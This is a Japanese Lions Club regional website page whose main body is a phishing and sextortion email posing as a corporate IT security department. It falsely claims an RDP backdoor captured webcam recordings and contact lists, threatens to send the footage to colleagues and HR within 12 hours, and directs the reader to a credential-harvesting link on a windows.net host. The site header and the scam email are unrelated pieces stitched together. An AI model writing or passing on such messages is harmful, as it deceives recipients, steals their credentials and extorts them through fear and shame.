Total Access : 279,392 (Today : 181 / Yesterday : 322)
このサイトは北海道全域ライオンズクラブの奉仕活動、クラブ活動、地域情報及びライオンズ情報を随時掲載しています。
| MD331情報サイト | 全体表示 | 331A | 331B | 331C |
*関係者各位 / guide@lionsclub.jp ご利用担当者様*
本メールは、ネットワーク外周監視システムにより自動送信されています。
現在、貴殿が使用されている業務端末において、極めて深刻なセキュリティインシデントが検知されました。
プロキシサーバーのログ監査の結果、リモートデスクトッププロトコル(RDP)の脆弱性が悪用され、
第三者によってアカウント(guide@lionsclub.jp)の制御権が奪取されていたことが判明いたしました。
*【現在のインシデント状況】*
外部の不正プログラム(バックドア)がシステム内で隠蔽された状態で動作していました。
これにより、カーネルレベルでWebカメラ、音声データ、およびブラウザの閲覧履歴へのアクセス権が握られていた状態です。
現在、攻撃者の外部サーバー内には、以下の機密・不適切な内容を含むデータアーカイブが構築されています。
・業務時間内および個人時間における、18禁成人向けコンテンツ閲覧時のWebカメラ録画映像
・上記行為を裏付ける、画面の同時スクショおよび動画キャプチャ
・社内メール、Outlook、および各種メッセンジャーから抽出された連絡先リスト(顧客・上司・同僚を含む)
の完全なダンプデータ
*【今後の対応と処置について】*
弊社の就業規則およびコンプライアンス規程に基づき、このようなデータの公表および流出は、
アカウントの即時凍結、人事委員会への付託、そして社内における深刻な信用失墜へと直結いたします。
しかしながら、本件はソフトウェアの脆弱性に起因するものであるため、システム上で自動的にログを消去し、
上層部や人事部へ報告することなくインシデントをクローズする特別措置が用意されています。
外部サーバーからアーカイブデータを完全に強制削除し、インシデントログを初期化するには、
以下の統合コーポレート・セキュリティポータルを通じて本人確認(セッションの再認証)を実行する必要があります。
▶ *【自動ログクリーンアップおよびデータ削除処理を実行する】
<https://tabawicada.z7.web.core.windows.net/>*
【対応期限について】
インシデントの自動エスカレーションタイマーが作動しています。「情報流出の危険性が極めて高い」
とのシステム判定に基づき、本メールの送信時刻から**【12時間以内】**に対応を完了させてください。
期限までに安全なセッションでの認証が確認できない場合、本件は自動的に社内の管理職および人事部へ転送され、
同時に動画を含むアーカイブデータが社内の全連絡先へ一斉送信されます。
本メールはシステムによる自動配信専用です。
このアドレスに返信されましても、サーバーにより自動的に破棄されますのでご了承ください。
*社内IT監査・ネットワークセキュリティ部 / Net-Sec Dept.*